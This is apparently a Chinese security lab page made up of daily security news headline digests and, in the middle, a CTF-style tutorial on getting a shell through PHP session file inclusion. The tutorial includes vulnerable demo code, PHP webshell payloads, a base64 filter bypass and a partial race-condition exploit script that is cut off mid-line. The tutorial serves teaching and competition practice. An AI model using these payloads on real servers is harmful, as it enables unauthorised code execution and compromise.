免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、思科Talos 披露 macOS SMB 漏洞的详细信息 https://www.securityweek.com/cisco-discloses-details-macos-smb-vulnerabilities 2、JBS 在网络攻击后恢复大部分生产 https://www.securityweek.com/largest-meat-producer-getting-back-online-after-cyberattack 3、微软收购 ReFirm Labs 以增强物联网固件安全 https://www.securityweek.com/microsoft-buys-refirm-labs-expand-iot-firmware-security-push 4、Lasso 库一高危漏洞影响Cisco、Akamai产品及Linux发行版 https://www.securityweek.com/vulnerability-lasso-library-impacts-products-cisco-akamai 5、多个供应商的工业交换机受Korenix 固件漏洞影响 https://www.securityweek.com/industrial-switches-several-vendors-affected-same-vulnerabilities 6、Fancy Product Designer WordPress插件零日漏洞影响上万网站 https://securityaffairs.co/wordpress/118522/hacking/fancy-product-designer-wordpress-plugin-flaw.html 7、Zerodium 出10W赏金寻求 Pidgin 零日漏洞 https://securityaffairs.co/wordpress/118500/breaking-news/zerodium-pidgin-0day.html 8、研究人员发现抢先交易行为每月从以太坊交易中窃取 2.8 亿美元 https://securityaffairs.co/wordpress/118512/hacking/280-million-stolen-per-month-from-crypto-transactions.html 9、研究人员发现针对韩国政府机构的黑客行动 https://thehackernews.com/2021/06/researchers-uncover-hacking-operations.html 10、由于云配置错误，《银河之战》 600 万玩家资料泄露 https://www.infosecurity-magazine.com/news/battle-galaxy-gamers-data-leak/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、毕马威报告称Accellion 未能及时通知客户 FTA 零日 https://www.securityweek.com/report-accellion-failed-notify-customers-fta-zero-day 2、卡巴斯基报告称2021年Q1网络攻击利用MS Office漏洞最多 https://www.securityweek.com/kaspersky-exploits-ms-office-flaws-most-popular-q1-2021 3、攻击者传播Android恶意软件Teabot和Flubot https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/ 4、瑞典公共卫生局遭黑客攻击后关闭了SmiNet数据库 https://www.bleepingcomputer.com/news/security/swedish-health-agency-shuts-down-sminet-after-hacking-attempts/ 5、印度加尔各答ATM机遭黑客攻击损失400万卢比 https://timesofindia.indiatimes.com/city/kolkata/kol-atms-under-sophisticated-hacking-attack/articleshow/83096894.cms 6、Stanadyne旗下公司遭到Conti勒索软件攻击 https://www.technadu.com/stanadynes-purepower-technologies-conti-ransomware-group/280366/ 7、研究人员发现多种支持EPUB格式的电子阅读系统中存在安全漏洞 https://portswigger.net/daily-swig/epub-vulnerabilities-electronic-reading-systems-riddled-with-browser-like-flaws 8、新兴Prometheus勒索软件团伙出售墨西哥政府数据 https://securityaffairs.co/wordpress/118446/cyber-crime/prometheus-grief-ransomware.html 9、白宫发言人称针对JBS的勒索软件攻击可能来自俄罗斯 https://securityaffairs.co/wordpress/118490/cyber-crime/jbs-attack-russian-origin.html 10、Nobelium 通过新的网络钓鱼活动再次活跃起来 https://cyware.com/news/nobelium-active-again-with-new-phishing-campaign-30bf4eee

在前些时间，国赛上再一次遇到了服务器本地文件包含session的漏洞，这是个老生常谈的东西了，但还是常常可以碰到，而我们想利用session来getshell往往还需要一些特殊的方法，借此机会，研究一番。 本文涉及相关实验：https://www.yijinglab.com/expc.do?ec=ECID21bb-8308-4117-ab95-a4602fa6c377  （本实验介绍了文件包含时绕过限制的原理，以及介绍利用文件包含漏洞读取源码的原理。） 基础知识 PHP SESSION的存储 SESSION会话存储方式 在Java中，用户的session是存储在内存中的，而在PHP中，则是将session以文件的形式存储在服务器某个文件中，我们可以在php.ini里面设置session的存储位置session.save_path 在很多时候服务器都是按照默认设置来运行的，假如我们发现了一个没有安全措施的session文件包含漏洞时，我们就可以尝试利用默认的会话存放路径去包含getshell，因此总结常见的php-session的默认存储位置是很有必要的 默认路径 /var/lib/php/sess_PHPSESSID /var/lib/php/sessions/sess_PHPSESSID /tmp/sess_PHPSESSID /tmp/sessions/sess_PHPSESSID session文件的存储路径是分为两种情况的 一是没有权限，默认存储在/var/lib/php/sessions/目录下，文件名为sess_[phpsessid]，而phpsessid在发送的请求的cookie字段中可以看到（一般在利用漏洞时我们自己设置phpsessid） 二是phpmyadmin，这时的session文件存储在/tmp目录下，需要在php.ini里把session.auto_start置为1，把session.save_path目录设置为/tmp 与 SESSION 有关的几个 PHP 选项 session.serialize_handler 一是php，服务器在配置文件或代码里面没有对session进行配置的话，PHP默认的会话处理方式就是session.serialize_handler=php这种模式机制，这种模式只对用户名的内容进行了序列化存储，没有对变量名进行序列化，我们可以看作是服务器对用户会话信息的半序列化存储 二是session.serialize_handler=php_serialize，这种处理模式在PHP 5.5后开始启用，与上一种类似，但无论是用户名的内容还是变量名等都进行了系列化，可以看作是服务器对用户会话信息的全序列化存储 三是php_binary，其存储方式是，键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值 常见就是以上三种，还有一些其他的比如session.serialize_handler = wddx等这里就不展开赘述了 对比上面session.serialize_handler的两种处理模式，可以看到他们在session处理上的差异，但我们编写代码不规范时对session的处理采用了多种情况，那么在攻击者可以利用的情况下，很可能会造成session反序列化漏洞。 session.auto_start 默认是off状态，如果开启这个选项，则PHP在接收请求的时候会自动初始化Session，不再需要执行session_start()。 session.use_strict_mode 默认是0，此时用户是可以自己定义Session ID的。比如，我们在Cookie里设置PHPSESSID=flag，PHP将会在服务器上创建一个文件：/tmp/sess_flag。即使此时用户没有初始化Session，PHP也会自动初始化Session,并产生一个键值. 因为sessid的可控，我们很容易借此达到我们getshell的目的，但是我们还存在session.upload_progress.cleanup session.upload_progress.cleanup 默认开启，一旦读取了所有POST数据，它就会清除进度信息，所以我们一般都要通过条件竞争来进行文件上传 session.upload_progress.enabled 默认情况下是开启的，但也当该配置开启时，我们今天要讲的重点才得以引出 Session Upload Progress Session Upload Progress 即 Session 上传进度，是php>=5.4后开始添加的一个特性。官网对他的描述是当 session.upload_progress.enabled 选项开启时（默认开启），PHP 能够在每一个文件上传时 监测上传进度。这个信息对上传请求自身并没有什么帮助，但在文件上传时应用可以发送一个POST请求到终端（例如通过XHR）来检查这个状态。 当一个上传在处理中，同时POST一个与INI中设置的session.upload_progress.name同名变量时，上传进度可以在 $_SESSION 中获得。 当PHP检测到这种POST请求时，它会在 $_SESSION 中添加一组数据，索引是 session.upload_progress.prefix 与 session.upload_progress.name 连接在一起的值。 下面给出一个php官方文档的一个进度数组的结构的样例： <form action="upload.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" /> <input type="file" name="file1" /> <input type="file" name="file2" /> <input type="submit" /> </form> 此时在session中存放的数据看上去是这样子的： <?php $_SESSION["upload_progress_123"] = array( // 其中存在上面表单里的value值"123" "start_time" => 1234567890, // The request time 请求时间 "content_length" => 57343257, // POST content length post数据长度 "bytes_processed" => 453489, // Amount of bytes received and processed 已接收的字节数量 "done" => false, // true when th LFI漏洞 LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件，例如Session会话文件、日志文件、临时文件等。但是，只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。 我们这里重点讲的是针对LFI Session文件包含，我们可以简单理解成以为配置的原因，用户可以控制session文件中的部分信息，然后将这部分信息更改为恶意代码，然后去包含这个session文件达到攻击效果，在下面，我会演示一下大概流程 演示代码 session.php <?php session_start(); $username = $_POST['username']; $_SESSION["username"] = $username; ?> index.php <?php $file = $_GET['file']; include($file); ?> payload 分析session.php可以看到用户会话信息username的值用户是可控的，因为服务器没有对该部分作出限制。那么我们就可以传入恶意代码就行攻击利用 我们传入 username=Abc 我们看到，系统给我们初始了一个sess_ID 可以看出我们可以对username进行控制，那么假如我们传入的是一句话木马呢 username=<?php eval($_REQUEST['Abc']);?> 一句话马传入了，我们试试是不是真的可以像我们想的那样执行 从攻击结果可以看到我们的payload和恶意代码确实都已经正常解析和执行。 当然这是一种理想化的简单的漏洞利用情况，但是在平常中会有很多限制，常见的就是两种：1.对用户的会话信息进行了一定的处理，例如对用户session信息进行编码或加密 2.没有代码session_start()进行会话的初始化操作，这时服务器无法生成用户session文件，同时，用户也无法进行恶意session文件包含 下面，我们来讲一讲怎么绕过这些限制 Session Base64Encode 很多时候服务器上的session信息会由base64编码之后再进行存储，那么假如存在本地文件包含漏洞的时候该怎么去利用绕过呢？下面通过一个案例进行讲解与利用。 demo session.php <?php session_start(); $username = $_POST['username']; $_SESSION['username'] = base64_encode($username); echo "username -> $username"; ?> index.php <?php $file = $_GET['file']; include($file); ?> exp 按照我们的一般套路注入 我们可以发现我们包含的session被编码了，导致LFI -> session失败。 在这里可以用逆向思维想一下，他既然对我们传入的session进行了base64编码，那么我们是不是只要对其进行base64解码然后再包含不就可以了，这个时候php://filter就可以利用上了。（其他编码同理） index.php?file=php://filter/read=convert.base64-decode/resource=/phpStudy/PHPTutorial/tmp/tmp/sess_gnl84oftbpj0l47o5m2hlooi92 吼，无法解码！ 这是为什么，来来来我们再仔细看看session文件内容 username|s:44:"PD9waHAgZXZhbCgkX1JFUVVFU1RbJ0FiYyddKTs/Pg=="; 看到了吗，这里并不是只有base64密文，还有username|s:44:"这一段非base64的字符串，编码与解码不对应，当然无法解码 那么我们有什么方法解决吗 首先我们先来了解一下base64编码的特点 Base64编码是使用64个可打印ASCII字符（A-Z、a-z、0-9、+、/）将任意字节序列数据编码成ASCII字符串，另有“=”符号用作后缀用途。 Base64将输入字符串按字节切分，取得每个字节对应的二进制值（若不足8比特则高位补0），然后将这些二进制数值串联起来，再按照6比特一组进行切分（因为2^6=64），最后一组若不足6比特则末尾补0。将每组二进制值转换成十进制，然后在上述表格中找到对应的符号并串联起来就是Base64编码结果。 由于二进制数据是按照8比特一组进行传输，因此Base64按照6比特一组切分的二进制数据必须是24比特的倍数（6和8的最小公倍数）。24比特就是3个字节，若原字节序列数据长度不是3的倍数时且剩下1个输入数据，则在编码结果后加2个=；若剩下2个输入数据，则在编码结果后加1个=。 一个字符串中，不管出现多少个特殊字符或者位置上的差异，都不会影响最终的结果，可以验证base64_decode是遇到不在其中的字符时，将会跳过这些字符，仅将合法字符组成一个新的字符串进行解码。 总而言之，要想正常解码，需要session前面的这部分数据长度需要满足4的整数倍，据此我们再次构造payload username=abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd<?php eval($_POST['Abc']);?> 符合，我们重新传参看看 执行成功 注：这是在session.serialize_handler=php配置下执行成功的，在其他配置下也是同样的原理 No session_start() 一般情况下，session_start()作为会话的开始出现在用户登录等地方以维持会话，但是如果一个网站存在LFI漏洞但却没有用户会话，那么我们该怎么去包含session信息呢 还记得我们上面说过的Session Upload Progress吗？ Session Upload Progress 最初是PHP为上传进度条设计的一个功能，在上传文件较大的情况下，PHP将进行流式上传，并将进度信息放在Session中，此时即使用户没有初始化Session，PHP也会自动初始化Session。而且，默认情况下session.upload_progress.enabled是为On的，也就是说这个特性默认开启。所以，我们可以通过这个特性来在目标主机上初始化Session。——https://xz.aliyun.com/u/31688 session中一部分数据(session.upload_progress.name)是用户自己可以控制的，那么我们在Cookie中设置PHPSESSID=Abc（默认情况下由于session.use_strict_mode=0用户可以自定义Session ID），同时POST恶意字段PHP_SESSION_UPLOAD_PROGRESS，只要上传包里带上这个键，PHP就会自动启用Session，又由于我们之前设置了Session ID，所以session文件会自动创建且可控 但又由于session.upload_progress.cleanup = on这个配置的存在，当文件上传结束后，php将会立即清空对应session文件中的内容，这会导致我们最终包含的只是一个空文件，所以我们要利用条件竞争，在session文件被清除之前利用 import io import requests import threading sessid = 'SsBNMsssSssssL' data = {"cmd":"system('cat flag.php');"} def write(session): while True: f = io.BytesIO(b'a' * 1024 * 50) resp = session.post('http://192.168.43.82', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php var_dump(scandir("/etc"));?>'}, files 国赛的脚本，改下payload即可

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、微软为亚太地区的公共部门创建网络安全委员会 https://www.securityweek.com/microsoft-creates-cybersecurity-council-public-sector-apac 2、SonicWall 修复了防火墙管理应用程序中的命令注入漏洞 https://www.securityweek.com/sonicwall-patches-command-injection-flaw-firewall-management-application 3、研究人员发现新型勒索软件 Epsilon Red https://www.securityweek.com/cybercriminals-target-companies-new-epsilon-red-ransomware 4、丹麦情报部门帮助美国国家安全局监视欧洲政客 https://securityaffairs.co/wordpress/118434/intelligence/us-nsa-spy-european-politicians.html 5、安全研究人员发现绕过Microsoft PatchGuard安全功能的漏洞 https://securityaffairs.co/wordpress/118427/hacking/microsoft-patchguard-kpp-bypass.html 6、亚马逊设备将启动自动与邻居设备共享你的 Wi-Fi功能 https://thehackernews.com/2021/05/your-amazon-devices-to-automatically.html 7、1.3亿条印度进出口数据记录在暗网中遭泄露 https://cybleinc.com/2021/05/28/130-million-records-of-india-based-import-export-data-allegedly-leaked-in-the-darkweb/ 8、网络钓鱼活动通过虚假电影网站分发BazarLoader https://cyware.com/news/fake-streaming-service-spreads-bazarloader-f8bdeeab 9、肉制品公司JBS Foods因大规模网络攻击而关闭 https://news.softpedia.com/news/jbs-foods-shuts-down-due-to-massive-cyberattack-533076.shtml 10、研究人员开发了一种针对机器学习系统的对抗性攻击-DeepSloth https://cyware.com/news/deepsloth-an-adversarial-attack-on-machine-learning-systems-dbfc5b2e

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员发现可对Siemens PLC进行远程攻击的严重漏洞 https://www.securityweek.com/newly-disclosed-vulnerability-allows-remote-hacking-siemens-plcs 2、研究人员披露新的攻击技术可更改认证的PDF文档 https://securityaffairs.co/wordpress/118404/hacking/altering-signed-pdf-documents.html 3、 360 NETLAB 发现了针对Linux名为 Facefish 的新后门 https://securityaffairs.co/wordpress/118388/malware/facefish-backdoor.html 4、FBI 将与 HIBP Pwned Passwords 共享调查期间发现的泄露密码 https://securityaffairs.co/wordpress/118377/security/fbi-passwords-hibp-pwned-passwords.html 5、SonicWall 修复了 NSM On-Prem 漏洞 https://securityaffairs.co/wordpress/118372/security/sonicwall-nsm-on-prem-bug.html 6、微软披露了 NOBELIUM 新型复杂鱼叉式网络钓鱼攻击 https://securityaffairs.co/wordpress/118352/apt/spear-phishing-attacks-nobelium.html 7、 研究人员披露浏览器劫持程序Secured Search https://securityaffairs.co/wordpress/118380/security/how-remove-secured-search.html 8、美国士兵使用的抽认卡APP意外泄露核信息 https://www.securityweek.com/nuclear-flash-cards-us-secrets-exposed-learning-apps 9、网络钓鱼活动冒充沃尔玛窃取个人信息 https://www.bleepingcomputer.com/news/security/beware-walmart-phishing-attack-says-your-package-was-not-delivered/ 10、墨西哥在勒索软件DDoS威胁后封锁了国家彩票网站 https://www.bleepingcomputer.com/news/security/mexico-walls-off-national-lottery-sites-after-ransomware-ddos-threat/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、QNAP设备持续受到网络攻击 https://cyware.com/news/qnap-devices-bombarded-by-cyberattacks-7af9e3bc2、日本预计俄黑客将在东京夏季奥运会时发动网络攻击 https://news.softpedia.com/news/japan-expects-russian-cyberattacks-on-tokyo-summer-olympics-533044.shtml3、俄罗斯情报局FSB报告针对政府机构的黑客攻击活动 https://www.usnews.com/news/technology/articles/2021-05-26/russias-fsb-reports-unprecedented-hacking-campaign-aimed-at-government-agencies4、西门子解决了影响其Solid Edge产品的CAD库漏洞 https://www.securityweek.com/siemens-addresses-code-execution-vulnerabilities-found-popular-cad-library5、富士通SaaS平台遭黑客入侵，日本政府文件被盗 https://therecord.media/fujitsu-suspends-projectweb-platform-after-japanese-government-hacks/6、VSCode扩展中新发现的严重漏洞可能导致供应链攻击 https://thehackernews.com/2021/05/newly-discovered-bugs-in-vscode.html7、FBI称APT组织通过未修补的Fortinet VPN入侵了美国地方政府网络 https://securityaffairs.co/wordpress/118338/apt/fortinet-vpn-us-municipal-government.html8、美国DHS宣布了针对关键管道所有者和运营商的新网络安全要求 https://securityaffairs.co/wordpress/118332/security/dhs-critical-pipeline-industry.html9、HPE修复了去年12月披露的关键0day漏洞 https://www.bleepingcomputer.com/news/security/hpe-fixes-critical-zero-day-vulnerability-disclosed-in-december/10、GraphQL存在跨站请求伪造攻击的风险 https://portswigger.net/daily-swig/overlooked-vulnerabilities-in-graphql-open-the-door-to-cross-site-request-forgery-attacks

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Vmware修复了vCenter Server一个高危漏洞 https://www.securityweek.com/vmware-urges-customers-immediately-patch-critical-vsphere-vulnerability2、Google Chrome 91发行版修补了32个漏洞 https://www.securityweek.com/google-patches-32-vulnerabilities-release-chrome-913、法国警方查封了黑暗网络市场Le MondeParallèle https://securityaffairs.co/wordpress/118295/deep-web/le-monde-parallele-dark-web.html4、谷歌安全人员发现了Rowhammer攻击新变种Half-Double https://securityaffairs.co/wordpress/118284/hacking/rowhammer-variant-dubbed-half-double.html5、比利时内政部遭复杂的网络攻击 https://securityaffairs.co/wordpress/118275/breaking-news/belgium-interior-ministry-cyber-attack.html6、CNCERT发布2020年我国互联网网络安全态势综述报告 https://mp.weixin.qq.com/s/a2nFajrBk3bxCynfC6hdQQ7、达美乐的印度公司披露了一起数据泄露事件 https://www.bleepingcomputer.com/news/security/dominos-india-discloses-data-breach-after-hackers-sell-data-online/8、美国非营利医疗保健服务提供商20万私人信息遭泄露 https://portswigger.net/daily-swig/us-healthcare-non-profit-reports-data-breach-impacting-200-000-patients-employees9、NIST首个后量子密码标准将于今年晚些时候确定 https://www.scmagazine.com/home/government/post-quantum-cryptographic-standards-to-be-finalized-later-this-year/10、安全人员发现数千个Chrome扩展程序篡改HTTP 安全标头 https://therecord.media/thousands-of-chrome-extensions-are-tampering-with-security-headers/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Bose遭勒索攻击和数据泄露 https://www.securityweek.com/bose-says-personal-information-compromised-ransomware-attack2、苹果发布macOS和iOS等系统更新修复零日漏洞 https://securityaffairs.co/wordpress/118227/breaking-news/apple-zero-day-flaws.html3、Ivanti修复了Pulse Connect Secure VPN中的严重漏洞 https://securityaffairs.co/wordpress/118257/security/pulse-connect-secure-vpn-flaw.html4、美国银行开始尝试使用人脸识别技术 https://securityaffairs.co/wordpress/118230/security/us-banks-facial-recognition.html5、趋势科技修复了家庭网络安全设备中的漏洞 https://www.securityweek.com/trend-micro-patches-vulnerabilities-home-network-security-devices6、塔尔萨市计算机系统遭受勒索软件攻击 https://www.securityweek.com/tulsa-computer-system-hacks-stopped-security-shutdown7、黑客承认窃取了超过65000名UPMC员工的敏感数据 https://www.infosecurity-magazine.com/news/michigan-man-admits-selling-upmc/8、MountLocker勒索软件利用Windows API进行传播 https://cyware.com/news/mountlocker-using-windows-api-to-spread-as-worm-9e1055679、1300万DailyQuiz用户个人详细信息在线泄露 https://therecord.media/8-3-million-plaintext-passwords-exposed-in-dailyquiz-data-breach10、TeamTNT以Kubernetes集群为目标，超5W个IP遭攻击 https://www.trendmicro.com/en_us/research/21/e/teamtnt-targets-kubernetes--nearly-50-000-ips-compromised.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员将CryptoCore活动与Lazarus Group 关联 https://thehackernews.com/2021/05/researchers-link-cryptocore-attacks-on.html 2、研究人员披露了Nagios的13个漏洞详情 https://thehackernews.com/2021/05/details-disclosed-on-critical-flaws.html 3、FBI分析师被指控窃取反恐和网络威胁信息 https://thehackernews.com/2021/05/fbi-analyst-charged-with-stealing.html 4、法国ANSSI的研究人员发现了Bluetooth Core和Mesh的多个漏洞 https://securityaffairs.co/wordpress/118219/hacking/bluetooth-core-mesh-specs-flaws.html 5、Zeppelin勒索软件即服务（RaaS）运营商卷土重来 https://securityaffairs.co/wordpress/118215/cyber-crime/zeppelin-ransomware-return.html 6、CVE-2021-31166 HTTP协议栈漏洞也影响WinRM服务器 https://securityaffairs.co/wordpress/118189/security/cve-2021-31166-windows-http-flaw.html 7、研究人员在波音747上实现了持久的Shell访问 https://www.theregister.com/2021/05/21/boeing_747_ife_windows_nt4_shell_access/ 8、Anker修复了Eufy摄像机泄露视频流的问题 https://securityaffairs.co/wordpress/118197/security/eufy-video-camera-flaw.html 9、由于SSL证书过期导致Exchange管理门户无法访问 https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-admin-portal-blocked-by-expired-ssl-certificate/ 10、研究人员开发了针对神经网络的DeepSloth攻击 https://portswigger.net/daily-swig/deepsloth-researchers-find-denial-of-service-equivalent-against-machine-learning-systems

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、印度航空遭黑客入侵并泄露数据，450W客户受影响 https://www.securityweek.com/indias-national-carrier-says-hack-leaked-passengers-data2、Microsoft推出SimuLand：开源的攻击场景模拟器 https://www.securityweek.com/microsoft-unveils-simuland-open-source-attack-techniques-simulator3、阿拉斯加卫生部网站遭恶意软件攻击而被迫下线 https://securityaffairs.co/wordpress/118184/cyber-crime/alaska-health-department-malware.html4、FBI称Conti 勒索软件攻击了美国的16个医疗和紧急服务部门 https://securityaffairs.co/wordpress/118167/cyber-crime/conti-ransomware-flash-alert.html5、FSB称外国黑客已入侵了俄罗斯联邦机构网络 https://securityaffairs.co/wordpress/118169/intelligence/fsb-says-russian-agencies-hacked.html6、保险巨头CNA Financial支付4000W赎金以恢复被勒索软件破坏的文件 https://securityaffairs.co/wordpress/118142/cyber-crime/cna-financial-ransomware.html7、Qlocker勒索软件利用HBS漏洞感染QNAP NAS设备 https://securityaffairs.co/wordpress/118179/malware/qlocker-ransomware-qnap-nas.html8、Python软件包存储库PyPI遭垃圾邮件轰炸 https://www.bleepingcomputer.com/news/security/spammers-flood-pypi-with-pirated-movie-links-and-bogus-packages/9、Comcast现已部署RPKI防范BGP劫持和路由泄漏 https://www.bleepingcomputer.com/news/security/comcast-now-blocks-bgp-hijacking-attacks-and-route-leaks-with-rpki/10、数据表明2020年全球范围内撞库攻击达1930亿次 https://www.infosecurity-magazine.com/news/global-credential-stuffing-193/